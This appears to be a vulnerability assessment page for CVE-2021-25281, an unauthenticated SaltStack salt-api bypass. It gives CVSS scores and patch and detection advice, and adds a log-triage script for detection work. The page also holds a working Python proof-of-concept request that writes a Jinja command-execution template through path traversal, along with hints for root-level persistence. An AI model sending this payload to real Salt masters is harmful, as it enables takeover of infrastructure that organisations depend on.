CVSS3: 9.8 High (a 9.8 base score is Critical on the CVSS v3.1 qualitative scale)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
An issue was discovered in SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an unauthenticated attacker can remotely run any wheel module on the master.
Recent assessments:
kevthehermit at February 26, 2021 5:08pm UTC reported:
<https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/>
This vulnerability is an auth bypass in the SaltStack API: specifically, when making requests to the wheel_async client, no checks are made to verify that the requester is authenticated.
SaltStack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component, which may limit the attack surface for organisations.
This is fairly trivial to exploit in order to run jobs against the salt master; however, there are some limitations in what actions you can perform. There is no cmd execution function.
A very simple example:
import requests

# Unauthenticated call: 'eauth': 'auto' with no username or password is
# accepted because the wheel_async client never verifies the credentials.
response = requests.post(
    'https://127.0.0.1:8000/run',
    verify=False,  # salt-api is usually served with a self-signed certificate
    json={
        'eauth': 'auto',
        'client': 'wheel_async',
        # wheel module that writes a file under pillar_roots; the relative
        # path walks out of that directory into /srv/salt
        'fun': 'pillar_roots.write',
        'data': '{{ salt["cmd.run"]("id > /tmp/whoami") }}',
        'path': '../../../../../../srv/salt/pwn.sls',
    },
)
# A JID in the response means the master accepted and queued the wheel job.
if body := response.json():
    print(f'Got JID: {body["return"][0]["jid"]}, the task was queued successfully')
You can edit the salt master configuration variables, which include the ability to set the auth_mode and sharedsecrets. If the API is restarted your changes take effect, at which point you gain the ability to execute code against the master.
You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. In the default installation on Ubuntu the API runs as root, so you can use actions like editing /etc/passwd or writing ssh-keys to /root/.ssh/id_rsa.
POC available at <https://github.com/Immersive-Labs-Sec/CVE-2021-25281>
The API typically runs on HTTPS, so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async functionality, every request to the instance will create a salt job. Salt stores the input and output of every job on disk, so it can be easy to review post-compromise activity.
More details can be found in this article – <https://www.immersivelabs.com/resources/blog/how-to-lock-onto-the-hackers-targeting-saltstack-minions/>
Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.
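The assessment above notes that every wheel_async request leaves a job on the master's disk. The script below is an added example of a post-compromise triage over such job records; it is not part of kevthehermit's assessment and not code from the Salt project. The records are constructed by hand to resemble the per-job load salt keeps in its local job cache (by default under /var/cache/salt/master/jobs, one .load.p msgpack file per JID); the field layout relied on (fun, user, kwargs with path/data), the "wheel." prefix on wheel jobs, the "UNKNOWN" user value and the set of wheel functions treated as sensitive are all assumptions, not facts taken from the page.

```python
"""Triage Salt master job records for abuse of the salt-api wheel_async client.

Added example (not from the assessment above or from the Salt project).
Assumed, not taken from the page: the record layout (fun/user/kwargs), the
'wheel.' prefix on wheel jobs, and the list of sensitive wheel functions.
Real records would be loaded with msgpack from the .load.p files under the
master's job cache (by default /var/cache/salt/master/jobs).
"""
import re
from typing import Dict, Iterable, List

# Wheel functions that change the master's files, auth configuration or
# accepted keys; a call to any of these without an expected user deserves a look.
SENSITIVE_WHEEL_FUNS = {
    "pillar_roots.write",
    "file_roots.write",
    "config.update_config",
    "config.apply",
    "key.accept",
    "key.gen_accept",
}

# '../' or '..\' segments in a path argument: the traversal pairing from the post.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# A Jinja expression block calling into salt[...] (rendered when the written
# .sls file is next applied), or any Jinja statement block.
JINJA_EXEC = re.compile(r"\{\{[^}]*\bsalt\s*\[|\{%")
# Config keys whose change hands an attacker a persistent way in after restart.
AUTH_CONFIG_KEYS = ("external_auth", "sharedsecret", "auth_mode")


def wheel_fun(record: Dict) -> str:
    """Wheel function name without the 'wheel.' prefix, or '' for non-wheel jobs."""
    fun = str(record.get("fun", ""))
    return fun[len("wheel."):] if fun.startswith("wheel.") else ""


def triage_job(record: Dict, expected_users: Iterable[str]) -> List[str]:
    """Return the reasons one job record looks like wheel_async abuse ([] if clean)."""
    reasons: List[str] = []
    fun = wheel_fun(record)
    if not fun:
        return reasons  # minion-targeted jobs are out of scope for this check
    # Arguments may sit in a kwargs sub-dict or at the top level of the low dict.
    params = {**record, **(record.get("kwargs") or {})}
    if fun in SENSITIVE_WHEEL_FUNS:
        reasons.append(f"sensitive wheel function {fun}")
    path = str(params.get("path", ""))
    if TRAVERSAL.search(path):
        reasons.append(f"path traversal in path={path!r}")
    if JINJA_EXEC.search(str(params.get("data", ""))):
        reasons.append("jinja execution block in written data")
    if fun.startswith("config.") and any(k in str(params) for k in AUTH_CONFIG_KEYS):
        reasons.append("master auth configuration change")
    user = record.get("user")
    if user not in set(expected_users):
        reasons.append(f"unexpected user {user!r}")
    return reasons


def triage_jobs(records: Iterable[Dict], expected_users: Iterable[str] = ("saltadmin",)) -> List[Dict]:
    """Run triage_job over many records; one finding per suspicious JID."""
    expected = set(expected_users)
    findings = []
    for record in records:
        reasons = triage_job(record, expected)
        if reasons:
            findings.append({"jid": record.get("jid"), "fun": record.get("fun"),
                             "user": record.get("user"), "reasons": reasons})
    return findings


# Constructed sample records (not real cache contents).
SAMPLE_RECORDS = [
    {   # the request from the assessment, as a job record
        "jid": "20210226170801000001",
        "fun": "wheel.pillar_roots.write",
        "user": "UNKNOWN",
        "kwargs": {
            "path": "../../../../../../srv/salt/pwn.sls",
            "data": '{{ salt["cmd.run"]("id > /tmp/whoami") }}',
        },
    },
    {   # the persistence step: rewriting master auth config to apply on restart
        "jid": "20210226170802000002",
        "fun": "wheel.config.update_config",
        "user": "UNKNOWN",
        "kwargs": {
            "file_name": "eauth.conf",
            "yaml_contents": "external_auth:\n  sharedsecret:\n    attacker:\n      - .*\n",
        },
    },
    {   # routine key listing by the expected API user
        "jid": "20210226170803000003",
        "fun": "wheel.key.list_all",
        "user": "saltadmin",
        "kwargs": {},
    },
    {   # ordinary minion job, not a wheel call
        "jid": "20210226170804000004",
        "fun": "test.ping",
        "user": "saltadmin",
        "tgt": "*",
    },
]

if __name__ == "__main__":
    for finding in triage_jobs(SAMPLE_RECORDS):
        print(finding["jid"], finding["fun"], finding["user"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run against the constructed records, the first two jobs are reported (traversal plus a Jinja salt[] call in the written data, and an auth configuration rewrite, both from an unexpected user) while the routine key listing and the minion job are not. To use it on a real master, replace SAMPLE_RECORDS with the loads read from the job cache and set expected_users to the accounts that legitimately drive salt-api.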
cdelafuente-r7 at April 09, 2021 4:04pm UTC reported:
Assessed Attacker Value: 4
Assessed Attacker Value: 5
packetstormsecurity.com/files/162058/SaltStack-Salt-API-Unauthenticated-Remote-Command-Execution.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25281
github.com/saltstack/salt/releases
lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7GRVZ5WAEI3XFN2BDTL6DDXFS5HYSDVB/
lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FUGLOJ6NXLCIFRD2JTXBYQEMAEF2B6XH/
lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YOGNT2XWPOYV7YT75DN7PS4GIYWFKOK5/
saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/
security.gentoo.org/glsa/202103-01
www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/